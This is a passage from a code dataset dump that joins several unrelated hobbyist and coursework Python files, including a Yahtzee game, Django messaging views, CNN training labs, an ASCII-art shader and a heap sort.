False\n\n\t#Checks if the roll is a 3 of a kind\n\tdef __is3Kind(self, roll):\n\n\t\tcount = [0,0,0,0,0,0]\n\n\t\tfor die in roll:\n\n\t\t\tcount[die - 1] += 1\n\n\t\tfor i in count:\n\n\t\t\tif i >= 3:\n\n\t\t\t\treturn True\n\n\t\treturn False\n\n\t#Checks if the roll is a 4 of a kind\n\tdef __is4Kind(self, roll):\n\n\t\tcount = [0,0,0,0,0,0]\n\n\t\tfor die in roll:\n\n\t\t\tcount[die - 1] += 1\n\n\t\tfor i in count:\n\n\t\t\tif i >= 4:\n\n\t\t\t\treturn True\n\n\t\treturn False\n\n\t#Checks if the roll is a full house\n\tdef __isHouse(self, roll):\n\n\t\tfstNum = 0\n\t\tsndNum = 0\n\n\t\tfstNum = roll[0]\n\n\t\tfor i in range(1, len(roll)):\n\n\t\t\tif roll[i] != fstNum and sndNum == 0:\n\n\t\t\t\tsndNum = roll[i]\n\n\t\t\telif roll[i] != fstNum and roll[i] != sndNum:\n\n\t\t\t\treturn False\n\n\t\treturn True\n\n\t#Checks if the roll is a small straight\n\tdef __isSmStraight(self, roll):\n\n\t\ttest = roll[0]\n\n\t\tif roll[1] == test + 1:\n\n\t\t\tfor i in range(0, len(roll) - 1):\n\n\t\t\t\tif roll[i] == test:\n\n\t\t\t\t\ttest += 1\n\n\t\t\t\telse:\n\n\t\t\t\t\treturn False\n\n\t\telse:\n\n\t\t\tfor i in range(1, len(roll)):\n\n\t\t\t\tif roll[i] == test:\n\n\t\t\t\t\ttest += 1\n\n\t\t\t\telse:\n\n\t\t\t\t\treturn False\n\n\t\treturn True\n\n\t#Checks if the roll is a large straight\n\tdef __isLgStraight(self, roll):\n\n\t\ttest = roll[0]\n\n\t\tfor die in roll:\n\n\t\t\tif die == test:\n\n\t\t\t\ttest += 1\n\n\t\t\telse:\n\n\t\t\t\treturn False\n\n\t\treturn True\n\n\t#Checks if the roll is a Yahtzee\n\tdef __isYahtzee(self, roll):\n\n\t\ttotal = self.__numCount(roll[0], roll)\n\n\t\tif total == 5:\n\n\t\t\treturn True\n\n\t\treturn False\n\n\t#This function tries to set the score of the category the user has selected. \n\t#It checks to see if it's available, if it exists and if the roll matches the rules for it\n\tdef __trySetScore(self, catName, roll):\n\n\t\tisSet = False\n\t\tisYahtzee = False\n\t\tpoints = 0\n\n\t\t#Check availibility of the category wanted\n\t\tisSet = self.__checkCardAvail(catName)\n\n\t\tif not isSet:\n\n\t\t\treturn isSet\n\n\t\t#Finds the category and scores it based on rules. Many categories are calculated (Have a negative number)\n\t\t#Also does the if 0 is okay check\n\t\tfor i in range(0, len(self.__cardCats)):\n\n\t\t\tif self.__cardCats[i] == catName:\n\n\t\t\t\tif self.__cardScores[i] == -1:\n\n\t\t\t\t\tpoints = self.__numTotaler(-1, roll)\n\n\t\t\t\t\tif points == 0:\n\n\t\t\t\t\t\tisSet = self.__zeroIsOkay()\n\n\t\t\t\t\telse:\n\n\t\t\t\t\t\tself.__upperScore += points\n\n\t\t\t\telif self.__cardScores[i] == -2:\n\n\t\t\t\t\tpoints = self.__numTotaler(-2, roll)\n\n\t\t\t\t\tif points == 0:\n\n\t\t\t\t\t\tisSet = self.__zeroIsOkay()\n\n\t\t\t\t\telse:\n\n\t\t\t\t\t\tself.__upperScore += points\n\n\t\t\t\telif self.__cardScores[i] == -3:\n\n\t\t\t\t\tpoints = self.__numTotaler(-3, roll)\n\n\t\t\t\t\tif points == 0:\n\n\t\t\t\t\t\tisSet = self.__zeroIsOkay()\n\n\t\t\t\t\telse:\n\n\t\t\t\t\t\tself.__upperScore += points\n\n\t\t\t\telif self.__cardScores[i] == -4:\n\n\t\t\t\t\tpoints = self.__numTotaler(-4, roll)\n\n\t\t\t\t\tif points == 0:\n\n\t\t\t\t\t\tisSet = self.__zeroIsOkay()\n\n\t\t\t\t\telse:\n\n\t\t\t\t\t\tself.__upperScore += points\n\n\t\t\t\telif self.__cardScores[i] == -5:\n\n\t\t\t\t\tpoints = self.__numTotaler(-5, roll)\n\n\t\t\t\t\tif points == 0:\n\n\t\t\t\t\t\tisSet = self.__zeroIsOkay()\n\n\t\t\t\t\telse:\n\n\t\t\t\t\t\tself.__upperScore += points\n\n\t\t\t\telif self.__cardScores[i] == -6:\n\n\t\t\t\t\tpoints = self.__numTotaler(-6, roll)\n\n\t\t\t\t\tif points == 0:\n\n\t\t\t\t\t\tisSet = self.__zeroIsOkay()\n\n\t\t\t\t\telse:\n\n\t\t\t\t\t\tself.__upperScore += points\n\n\t\t\t\telif self.__cardScores[i] == -30:\n\n\t\t\t\t\tpoints = self.__totalDice(roll)\n\n\t\t\t\t\tif not self.__is3Kind(roll):\n\t\n\t\t\t\t\t\tisSet = self.__zeroIsOkay()\n\n\t\t\t\t\telse:\n\n\t\t\t\t\t\tself.__lowerScore += points\n\n\t\t\t\telif self.__cardScores[i] == -40:\n\n\t\t\t\t\tpoints = self.__totalDice(roll)\n\n\t\t\t\t\tif not self.__is4Kind(roll):\n\t\n\t\t\t\t\t\tisSet = self.__zeroIsOkay()\n\n\t\t\t\t\telse:\n\n\t\t\t\t\t\tself.__lowerScore += points\n\n\t\t\t\telif self.__cardScores[i] == -10:\n\n\t\t\t\t\tself.__lowerScore += self.__totalDice(roll)\n\n\t\t\t\t#Here the categories are not calculated, but have a set point value\n\t\t\t\telse:\n\n\t\t\t\t\tif catName == 'House':\n\n\t\t\t\t\t\tisSet = self.__isHouse(roll)\n\n\t\t\t\t\telif catName == 'Sm Straight':\n\n\t\t\t\t\t\tisSet = self.__isSmStraight(roll)\n\n\t\t\t\t\telif catName == 'Lg Straight':\n\n\t\t\t\t\t\tisSet = self.__isLgStraight(roll)\n\n\t\t\t\t\telse:\n\n\t\t\t\t\t\tisSet = self.__isYahtzee(roll)\n\t\t\t\t\t\tisYahtzee = True\n\n\t\t\t\t\tif not isSet:\n\n\t\t\t\t\t\tisSet = self.__zeroIsOkay()\n\n\t\t\t\t\t\tif isSet:\n\n\t\t\t\t\t\t\tself.__yahtzeeIsZero = True\n\n\t\t\t\t\telse:\n\n\t\t\t\t\t\tself.__lowerScore += self.__cardScores[i]\n\n\t\t\t\tif isSet:\n\n\t\t\t\t\tself.__cardCats[i] = 'X'\n\t\t\t\n\t\treturn isSet\n\n\t#Adds-up all the dice in the roll\n\tdef __totalDice(self, roll):\n\n\t\ttotal = 0\n\n\t\tfor die in roll:\n\n\t\t\ttotal += die\n\n\t\treturn total\n\n\t#Counts the number of occurences of a value. EX: How many dice have rolled a 6\n\tdef __numCount(self, num, roll):\n\n\t\ttotal = 0\n\n\t\tfor die in roll:\n\n\t\t\tif die == num:\n\n\t\t\t\ttotal += 1\n\n\t\treturn total\n\t\n\t#Adds-up all (num) values in the roll. EX: all 6's\n\tdef __numTotaler(self, num, roll):\n\n\t\ttotal = 0\n\n\t\tif num < 0:\n\n\t\t\tnum *= -1\n\n\t\tfor die in roll:\n\n\t\t\tif die == num:\n\n\t\t\t\ttotal += num\n\n\t\treturn total\n\n\t#Check if a category is availible to score\n\tdef __checkCardAvail(self, catName):\n\n\t\tisAvail = False\n\n\t\tfor cat in self.__cardCats:\n\n\t\t\tif cat == catName:\n\n\t\t\t\tisAvail = True\n\n\t\treturn isAvail\n\n\t#Gets the die numbers the player wants to set aside and not re-roll\n\tdef __getKeepSet(self, numOfDice=5):\n\n\t\tbadInput = True\n\n\t\twhile badInput:\n\n\t\t\tkeepSet = input(\"Enter the numbers of the dice you want to keep: \")\n\t\t\tkeepSet = self.__parseKeep(keepSet)\n\n\t\t\tif keepSet[0] == -1 and len(keepSet) > 1:\n\n\t\t\t\tprint(\"If you didn't want to keep any (you entered 0)\", new=\"\")\n\t\t\t\tprint(\"why the multiple numbers? Enter just 0 please.\")\n\n\t\t\telif keepSet[0] == -1:\n\n\t\t\t\tbadInput = False\n\n\t\t\telse:\n\n\t\t\t\tif keepSet != 'Parse Error':\n\n\t\t\t\t\tbadInput = False\n\n\t\t\t\t\tfor index in keepSet:\n\n\t\t\t\t\t\tif index < 0 or index > (numOfDice - 1):\n\n\t\t\t\t\t\t\tprint(\"Error: Die numbers are 1 - \", end=\"\")\n\t\t\t\t\t\t\tprint(numOfDice)\n\t\t\t\t\t\t\tbadInput = True\n\n\t\t\t\telse:\n\n\t\t\t\t\tprint(\"Error: Enter the numbers of the dice you want to keep!\")\n\n\t\treturn keepSet\n\n\t#Rolls the cup by removing the appropriate number of dice from it (It starts filled with 5)\n\tdef __rollCup(self, numOfDice = 5):\n\n\t\troll = []\n\n\t\tself.__cup = self.__cup[:numOfDice]\n\n\t\tfor i in range(0, numOfDice):\n\n\n\t\t\troll.append(self.__cup[i].roll())\n\n\t\troll.sort()\n\t\tself.__fillCup();\n\n\t\treturn roll\n\n\t#Fills the cup with 5 dice\n\tdef __fillCup(self):\n\n\t\tself.__cup = [Die(), Die(), Die(), Die(), Die()]\n\n\t#To get the numbers of the dice the player wants to keep, the string is parsed. Spaces are allowed\n\tdef __parseKeep(self, keepList):\n\n\t\tdieIndeces = []\n\t\trepeats = 0\n\n\t\t#Extract the numbers and check that they are in range\n\t\tfor char in keepList:\n\n\t\t\ttry:\n\n\t\t\t\tdieIndeces.append(int(char) - 1)\n\n\t\t\t\tif dieIndeces[len(dieIndeces) - 1] < -1 or dieIndeces[len(dieIndeces) - 1] > 4:\n\n\t\t\t\t\traise ValueError('Number out of range')\n\n\t\t\texcept ValueError:\n\n\t\t\t\tif char != ' ':\n\n\t\t\t\t\treturn 'Parse Error'\n\t\tdieIndeces.sort()\n\n\t\t#Step one in removing repeats is to replace all repeats with a 10\n\t\tfor i in range(1, len(dieIndeces)):\n\n\t\t\tif dieIndeces[i] == dieIndeces[i - 1]:\n\n\t\t\t\tdieIndeces[i] = 10\n\t\t\t\trepeats += 1\n\n\t\tdieIndeces.sort()\n\n\t\t#For every repeat (for every 10), delete it. Yes, it doesn't look for 10's, why use 10's?\n\t\t#Sorting the list causes the 10's to be at the end always\n\t\tfor i in range(0, repeats):\n\n\t\t\tdel dieIndeces[len(dieIndeces) - 1]\n\n\t\treturn dieIndeces\n\n\t#Makes a list of the dice, out of the roll, the player wanted to keep\n\tdef __keep(self, diceSet, keepIndeces):\n\n\t\tdiceKept = []\n\n\t\tfor i in keepIndeces:\n\n\t\t\tdiceKept.append(diceSet[i])\n\n\t\treturn diceKept\n","sub_path":"Yahtzee.py","file_name":"Yahtzee.py","file_ext":"py","file_size_in_byte":16761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"283285393","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom users.models import Users \nfrom django.contrib.auth.models import User\nfrom privateMsg.models import *\n\n# Create your views here.\ndef test(request):\n\treturn HttpResponse('hello')\n\ndef createMsg(request):\n\tif request.is_ajax():\n\t\tmsg_title = request.GET['postsTitle']\n\t\tmsg_content = request.GET['postsContent']\n\t\tuserYNickname = request.GET['toUserNIckname']\n\n\t\tuserY = Users.objects.get(nickname=userYNickname)\n\t\tuser = request.user\n\t\tuserX = Users.objects.get(user=user)\n\n\t\txToy = XtoY.objects.get_or_create(userX=userX,userY=userY)[0]\n\t\t\n\t\tmsg = PrivateMsg(msg_title=msg_title,msg_content=msg_content,msg_status='new',xToy=xToy)\n\t\tmsg.save()\n\n\treturn HttpResponse('hello')\n\n#这个函数的功能应该是查出我与几个人聊天,然后每个人的新消息数目\ndef getAllMsgs(request):\n\tcontext = {}\n\t#1.先根据登录用户在Users表中查询该用户id\n\tusersMe = Users.objects.get(user=request.user)\n\t#2.然后根据该用户id在XtoY表中查找跟这个用户相关的聊天关系\n\txToys1 = XtoY.objects.filter(userX = usersMe)#我发给别人的消息\n\txToys2 = XtoY.objects.filter(userY = usersMe)#别人发给我的消息\n\tchatterCounts = len(xToys1) + len(xToys2)\n\n\t#3.接着根据聊天关系在私信表里查询相关连的私信\n\tnewMsgCounts = 0\n\tmsgCounts = 0\n\tfor xtoy1 in xToys1:\n\t\tpriMsgs1 = PrivateMsg.objects.filter(xToy = xtoy1)#我发给别人的消息\n\t\tfor pm in priMsgs1:\n\t\t\tmsgCounts += 1\n\t\t\tif pm.msg_status == 'new':\n\t\t\t\tnewMsgCounts += 1\n\t\t#统计每个人的新消息数目\n\t\tcontext[xtoy1.userY.nickname + '_mc'] = newMsgCounts\n\tfor xtoy2 in xToys2:\n\t\tpriMsgs2 = PrivateMsg.objects.filter(xToy = xtoy2)#别人发给我的消息\n\t\tfor pm in priMsgs2:\n\t\t\tmsgCounts += 1\n\t\t\tif pm.msg_status == 'new':\n\t\t\t\tnewMsgCounts += 1\n\t\t#统计每个人的新消息数目\n\t\tcontext[xtoy2.userX.nickname + '_mc'] = newMsgCounts\n\n\tprint('chatterCounts:' + str(chatterCounts) + ' msgCounts:' + str(msgCounts))\n\tcontext['chatterCounts'] = chatterCounts\n\tcontext['msgCounts'] = msgCounts\n\tcontext['newMsgCounts'] = newMsgCounts\n\n\n\tcontext['chatter_list1'] = xToys1\n\tcontext['chatter_list2'] = xToys2\n\tcontext['priMsg_list1'] = priMsgs1\n\tcontext['priMsg_list2'] = priMsgs2\n\treturn render(request,'chatList.html',context)\n\ndef getChatContent(request):\n\tcontext = {}\n\txToyId = request.GET['chatter']\n\txToy = XtoY.objects.get(id=xToyId)\n\tpriMsgs = PrivateMsg.objects.filter(xToy=xToy)\n\n\tcontext['priMsgs'] = priMsgs\n\treturn render(request,'primsg.html',context)","sub_path":"myforum/privateMsg/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"506329674","text":"from iops_data_2019 import phase1\nfrom hotspot import evaluation\nfrom tqdm import tqdm\nimport ray\n\nSTRIDE = 288\nhist_time_period = 13\nreal_list = phase1.data_frame_list[13*288:]\nhist_list = phase1.data_frame_list[:13*288]\ninterval_len = 5 * 60\nM = 10\nPT = 0.9\nT_EEP = 0.2\nT_EP = 0.9\nwindow = 4\nstart_real_time = real_list[0].index[0]\nsimulate_time = 20\n\nray.init()\n\n\nif __name__ == \"__main__\":\n root_cause_1 = [{'i': 'i02'}, {'i': 'i04'}]\n root_cause_2 = [{'i': 'i02', 'e': 'e04'},\n {'i': 'i07', 'e': 'e06'},\n {'i': 'i08', 'e': 'e06'}]\n F_score_1 = F_score_2 = []\n rate = 0.6\n moment = 1536888000\n result = open(\"random_evaluation.txt\", 'w')\n result.write(\">> root cause 1 --- {} \\n\".format(root_cause_1))\n result.write(\">> root cause 2 --- {} \\n\".format(root_cause_2))\n for k in tqdm(range(simulate_time)):\n F_score_1.append(evaluation.evaluate(root_cause_1, rate, moment, real_list, \"adtributor_MCTS\"))\n F_score_2.append(evaluation.evaluate(root_cause_2, rate, moment, real_list, \"adtributor_MCTS\"))\n result.write(\">> simulation time: {} \\n\".format(k))\n result.write(\"root cause 1 F score: {} \\n\".format(F_score_1[k]))\n result.write(\"root cause 2 F score: {} \\n\".format(F_score_2[k]))\n result.close()\n","sub_path":"Code/hotspot/random_evaluation.py","file_name":"random_evaluation.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"19257383","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n\nimport os\nimport shutil\nfrom os.path import isfile, join\n# from subprocess import call\n\nfrom floo_powder.data_interaction import ref_process\nfrom floo_powder.html_process import add_js_files\nfrom floo_powder.js_selector_trans import selector_trans\nfrom floo_powder.js_extract import inside_js_extract\nfrom floo_powder.js_beautifier import beautify_tar_js\n\n# path = sys.argv[1]\n# tar = sys.argv[2]\n# ref = sys.argv[3]\n\npath = '/Users/4faramita/Desktop/webpage'\ntar = 'tar99'\nref = 'ref100'\n\npath_tar = path + os.sep + tar + os.sep\npath_ref = path + os.sep + ref + os.sep\ndb_name = tar + '_' + ref\n\n# Process all *.js in path_ref\nref_process(path_ref)\ninside_js_extract(path_tar + tar + '.htm')\n\n\n# copy whole dir with structure(with tweak)\ndef _copytree_tar(src: str, dst: str, symlinks=False, ignore=None):\n if not os.path.exists(dst):\n os.makedirs(dst)\n for item in os.listdir(src):\n src_file_path = os.path.join(src, item)\n dst_file_path = os.path.join(dst, item)\n if os.path.isdir(src_file_path):\n _copytree_tar(src_file_path, dst_file_path, symlinks, ignore)\n else:\n if (not os.path.exists(dst_file_path) or\n os.stat(src_file_path).st_mtime - os.stat(dst_file_path).st_mtime > 1):\n if src_file_path.endswith('.js'):\n try:\n shutil.copy2(src_file_path, path_ref + os.sep + 'tarJS' + os.sep)\n except FileNotFoundError:\n os.makedirs(path_ref + os.sep + 'tarJS' + os.sep)\n shutil.copy2(src_file_path, path_ref + os.sep + 'tarJS' + os.sep)\n elif not src_file_path.endswith('.css') and not src_file_path.endswith('.DS_Store'):\n shutil.copy2(src_file_path, dst_file_path)\n\n\n# copy everything except *.css and *.js in tar# into ref#\n# copy *.js into ref#/tarJS\n_copytree_tar(path_tar, path_ref)\n\n# call node to prettify all *.js files\n# call(['node', 'floo_powder' + os.sep + 'prettifier.js', path_ref + 'tarJS'])\n# I killed node! Let's use Python to beautify!\nbeautify_tar_js(path_ref + 'tarJS')\n\n# String to add to HTML files\njs_to_add = '\\n\\n'\n\njs_files = [f for f in os.listdir(path_ref + os.sep + 'tarJS' + os.sep)\n if isfile(join(path_ref + os.sep + 'tarJS' + os.sep, f))]\nfor js_file in js_files:\n status = selector_trans(\n path_ref + 'tarJS' + os.sep + js_file,\n db_name\n )\n\n if status:\n js_to_add = (js_to_add +\n '\\n')\n# print(js_to_add)\n\nadd_js_files(db_name, ref, path_ref + ref + '.htm', js_to_add)\n","sub_path":"floo_powder/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"157143801","text":"from PIL import Image, ImageStat\nimport imageToBlock\n\ngrayScale = \"$@B%8&WM#*oahkbdpqwmZO0QLCJUYXzcvunxrjft/\\|()1{}[]?-_+~<>i!lI;:,\\\"^`'. \"\n\n# Returns the gray scale 1-70\n# Takes in: Small Img\n# Spits out: letter\ndef determineShade(img):\n # NOTE: 000 is Black, 255255255 is White\n # GrayScale[0] Darkest, GrayScale[70] Lightest\n sta = ImageStat.Stat(img)\n\n numAvg = findMean(sta.mean)\n return grayScale[findShade(numAvg)]\n\n\n# Find the mean of numbers in list\n# Takes in: list of num\n# Spits out: average\ndef findMean(lst):\n temp = 0\n for x in lst:\n temp += x\n\n return temp/len(lst)\n\n# Find the shade value\n# Takes in: average value\n# Spits out: Number between 0-69\ndef findShade(num):\n shade = int(num * (70 / 255)) - 1\n if shade < 0:\n shade = 0\n return shade\n\n# Use shade on all\n# Takes in: the list of images\n# Return: Tuple with (x, y, letter)\ndef allLetters(imgs):\n ltr = []\n for img in imgs:\n ltr.append((img[0], img[1], determineShade(img[2])))\n\n return ltr\n\n\n# Test \ndef determineShadeTest(img):\n sta = ImageStat.Stat(img)\n\n numAvg = findMean(sta.mean)\n return findShade(numAvg)\n\ndef allLettersTest(imgs):\n ltr = []\n allNum = []\n for img in imgs:\n if determineShadeTest(img[2]) not in allNum:\n allNum.append(determineShadeTest(img[2]))\n ltr.append((img[0], img[1], \",\" + str(determineShadeTest(img[2]))))\n \n print(len(allNum))\n print(allNum)\n return ltr\n","sub_path":"blockToSym.py","file_name":"blockToSym.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"55386604","text":"import json\nimport re\nimport urllib\nimport urllib2\n\n\n\n#This class will find an IMDB Movie id given a movie title\n#It can be used to help correct erroneous movie titles\nclass IdFinder:\n\n def __init__(self):\n pass\n\n def _lookupSite(self, title):\n\n domain = \"imdb.com\"\n urlparser = \"imdb.com/title\\/(.*?)\\/\"\n #searchURL = \"http://www.google.com/search?q=site%%3A%s+%s\" % (domain, title)\n searchURL = \"http://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=site%%3A%s+%s\" % (domain, title)\n return {\n \"domain\": domain,\n \"urlparser\": urlparser,\n \"searchURL\": searchURL,\n }\n\n def findIdByTitle(self, title):\n \"\"\" \"\"\"\n lookupSite = self._lookupSite(title)\n searchURL = lookupSite[\"searchURL\"]\n results = json.load(urllib.urlopen(searchURL))\n try:\n url = results['responseData']['results'][0]['url']\n IMDBId = re.search(lookupSite[\"urlparser\"], url).group(1)\n except:\n IMDBId = None\n\n return IMDBId\n\n def findIdByTitleList(self, titleList):\n idDict = {}\n for title in titleList:\n idDict[title] = self.findIdByTitle(title)\n return idDict\n\n\n","sub_path":"src/IdFinder.py","file_name":"IdFinder.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"56458054","text":"import time\nimport numpy as np\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport matplotlib.pyplot as plt\nfrom lab2.tf_CNN import tf_CNN\nfrom lab2.CNN_cifar import CNN_cifar\nimport os\nfrom lab2.cifar_readdata import shuffle_data, unpickle, draw_image\nfrom data import Random2DGaussian\n\nDATA_DIR = 'C:\\\\Users\\\\Igor Farszky\\\\PycharmProjects\\\\duboko\\\\duboko_ucenje\\\\lab2\\\\train_dirs\\\\train_dir\\\\data_dir'\nCIFAR_DATA_DIR = 'C:\\\\Users\\\\Igor Farszky\\\\PycharmProjects\\\\duboko\\\\duboko_ucenje\\\\lab2\\\\cifar'\n\nimg_width = 32\nimg_height = 32\nnum_channels = 3\n\nconfig = {}\nconfig['max_epochs'] = 8\nconfig['batch_size'] = 50\nconfig['lr_policy'] = {1:{'lr':1e-1}, 3:{'lr':1e-2}, 5:{'lr':1e-3}, 7:{'lr':1e-4}}\n\ndef zad3() :\n np.random.seed(int(time.time() * 1e6) % 2 ** 31)\n\n dataset = input_data.read_data_sets(DATA_DIR, one_hot=True)\n\n train_x = dataset.train.images\n train_x = train_x.reshape([-1, 28, 28, 1])\n train_y = dataset.train.labels\n\n valid_x = dataset.validation.images\n valid_x = valid_x.reshape([-1, 28, 28, 1])\n valid_y = dataset.validation.labels\n\n test_x = dataset.test.images\n test_x = test_x.reshape([-1, 28, 28, 1])\n test_y = dataset.test.labels\n\n train_mean = train_x.mean()\n train_x -= train_mean\n valid_x -= train_mean\n test_x -= train_mean\n\n CNN = tf_CNN(num_input=50, num_classes=10)\n CNN.train(train_x, train_y, num_epochs=8, batch_size=100)\n CNN.predict(test_x)\n\n slika = test_x[0, :, :, 0]\n slika2 = test_x[len(test_x) - 1, :, :, 0]\n plt.figure(1)\n plt.imshow(slika, cmap=plt.get_cmap('gray'), vmin=0, vmax=1)\n plt.figure(2)\n plt.imshow(slika2, cmap=plt.get_cmap('gray'), vmin=0, vmax=1)\n plt.show()\n\ndef zad4():\n\n data = Random2DGaussian()\n\n train_x = np.ndarray((0, img_height * img_width * num_channels), dtype=np.float32)\n train_y = []\n for i in range(1, 6):\n subset = unpickle(os.path.join(CIFAR_DATA_DIR, 'data_batch_%d' % i))\n train_x = np.vstack((train_x, subset['dataset']))\n train_y += subset['labels']\n train_x = train_x.reshape((-1, num_channels, img_height, img_width)).transpose(0, 2, 3, 1)\n train_y = np.array(train_y, dtype=np.int32)\n\n subset = unpickle(os.path.join(CIFAR_DATA_DIR, 'test_batch'))\n test_x = subset['dataset'].reshape((-1, num_channels, img_height, img_width)).transpose(0, 2, 3, 1).astype(np.float32)\n test_y = np.array(subset['labels'], dtype=np.int32)\n test_yoh = data.class_to_onehot(test_y)\n\n valid_size = 5000\n train_x, train_y = shuffle_data(train_x, train_y)\n train_y = data.class_to_onehot(train_y)\n\n valid_x = train_x[:valid_size, ...]\n valid_y = train_y[:valid_size, ...]\n\n train_x = train_x[valid_size:, ...]\n train_y = train_y[valid_size:, ...]\n\n data_mean = train_x.mean((0, 1, 2))\n data_std = train_x.std((0, 1, 2))\n\n train_x = (train_x - data_mean) / data_std\n valid_x = (valid_x - data_mean) / data_std\n test_x = (test_x - data_mean) / data_std\n\n CNN = CNN_cifar(num_input=100, num_classes=10)\n CNN.train(train_x, train_y, valid_x, valid_y, num_epochs=8, batch_size=50)\n test_preds = CNN.predict(test_x)\n test_preds_classes = np.argmax(test_preds, axis=1)\n test_preds_maxes = [np.max(i) for i in test_preds]\n\n sorted_preds = list(reversed(sorted((e,i) for i,e in enumerate(test_preds_maxes))))\n netocni_indexi = []\n for i in sorted_preds:\n if test_preds_classes[i[1]] != test_y[i[1]]:\n netocni_indexi.append(i[1])\n\n iter = 0\n for key in netocni_indexi:\n if iter == 20:\n break\n\n net_index = key\n\n tocan_razred = test_y[net_index]\n pred_razred = test_preds_classes[net_index]\n print(\"predikcija={}, tocno={}\".format(pred_razred, tocan_razred))\n\n class_preds = list(reversed(sorted((e,i) for i,e in enumerate(test_preds[net_index]))))\n\n iter_class_preds = 3\n print_classes = ''\n for key_inner in class_preds:\n if iter_class_preds == 0:\n break\n print_classes += 'razred={} vjerojatnost={} :: '.format(key_inner[1], key_inner[0])\n iter_class_preds -= 1\n print(print_classes)\n print(\"\\n\")\n iter += 1\n\n slika = test_x[net_index, :, :, :]\n plt.figure(iter)\n draw_image(slika, data_mean, data_std)\n\nif __name__ == \"__main__\":\n\n # zad3()\n zad4()\n\n","sub_path":"lab2/main_lab2.py","file_name":"main_lab2.py","file_ext":"py","file_size_in_byte":4395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"317024279","text":"def averageFunc(globalAverage):\r\n print(\"Average Score is \" + str(globalAverage))\r\n\r\ndef averageProcessing(globalScoreCount, globalTotalScore):\r\n average = globalTotalScore / globalScoreCount\r\n \r\n return average\r\n\r\ndef inputFunc():\r\n print(\"Input Score count\")\r\n inputScoreCount = float(input())\r\n \r\n return inputScoreCount\r\n\r\ndef loopAverage(globalScoreCount):\r\n totalScore = 0\r\n newScoreCount = globalScoreCount\r\n while newScoreCount > 0:\r\n print(\"Input \" + str(newScoreCount) + \" number of scores\" + \"Total: \" + str(totalScore))\r\n inputScore = float(input())\r\n newScoreCount = newScoreCount - 1\r\n totalScore = totalScore + inputScore\r\n \r\n return totalScore\r\n\r\n# Main\r\n# A simple program that tells you the average of your scores\r\nglobalScoreCount = inputFunc()\r\nglobalTotalScore = loopAverage(globalScoreCount)\r\nglobalAverage = averageProcessing(globalScoreCount, globalTotalScore)\r\naverageFunc(globalAverage)\r\n","sub_path":"Assignment 9/Activity 2.py","file_name":"Activity 2.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"53152614","text":"from os.path import expanduser\nimport shutil\nimport os\nimport json\n\n\nglobal_image = {}\nimageLoaded = False\n\n\nclass MaskGenLoader:\n def __init__(self):\n self.load()\n\n def load(self):\n global global_image\n global imageLoaded\n if imageLoaded:\n return\n file_path = os.path.join(expanduser(\"~\"), \".maskgen2\")\n if os.path.exists(file_path):\n with open(file_path, \"r\") as jsonfile:\n global_image = json.load(jsonfile)\n imageLoaded = True\n\n def get_key(self, image_id, default_value=None):\n global global_image\n return global_image[image_id] if image_id in global_image else default_value\n\n def _backup(self):\n mainfile = os.path.join(expanduser(\"~\"), \".maskgen2\")\n backup = os.path.join(expanduser(\"~\"), \".maskgen2.bak\")\n if os.path.exists(mainfile):\n if os.path.exists(backup):\n # A mild protection against backing-up a corrupted file. These files do not shrink much normally\n mainsize = os.path.getsize(mainfile)\n backupsize = os.path.getsize(backup)\n okToBackup = mainsize >= 0.8*(backupsize)\n else:\n okToBackup= True\n else:\n okToBackup = False\n if (okToBackup):\n shutil.copy(mainfile,backup)\n\n def save(self, image_id, data):\n global global_image\n global_image[image_id] = data\n self._backup()\n file_path = os.path.join(expanduser(\"~\"), \".maskgen2\")\n with open(file_path, 'w') as f:\n json.dump(global_image, f, indent=2)\n\n def saveall(self, idanddata):\n global global_image\n for image_id, data in idanddata:\n global_image[image_id] = data\n file_path = os.path.join(expanduser(\"~\"), \".maskgen2\")\n self._backup()\n with open(file_path, 'w') as f:\n json.dump(global_image, f, indent=2)\n\ndef main():\n import sys\n loader = MaskGenLoader()\n args = sys.argv[1:]\n i = 0\n while i < len(args):\n id = args[i]\n v = args[i+1]\n loader.save(id,v)\n i+=2\n\nif __name__ == '__main__':\n main()\n","sub_path":"maskgen/maskgen_loader.py","file_name":"maskgen_loader.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"388196368","text":"def build_heap(array):\n heap_size = len(array)\n last_parent = (len(array) - 2) // 2\n for i in range(last_parent, -1, -1):\n heapify(array, i, heap_size)\n\n\ndef heapify(heap, i, heap_size):\n left, right = 2 * i + 1, 2 * i + 2\n max = i\n if left < heap_size and heap[left] > heap[i]:\n max = left\n if right < heap_size and heap[right] > heap[max]:\n max = right\n if i != max:\n heap[i], heap[max] = heap[max], heap[i]\n heapify(heap, max, heap_size)\n\n\ndef heap_sort(array, *_):\n build_heap(array)\n heap_size = len(array)\n for i in range(len(array) - 1, 0, -1):\n array[0], array[i] = array[i], array[0]\n heap_size -= 1\n heapify(array, 0, heap_size)\n","sub_path":"src/algorithms/heap_sort.py","file_name":"heap_sort.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"130849297","text":"\n\nfrom xai.brain.wordbase.nouns._rump import _RUMP\n\n#calss header\nclass _RUMPS(_RUMP, ):\n\tdef 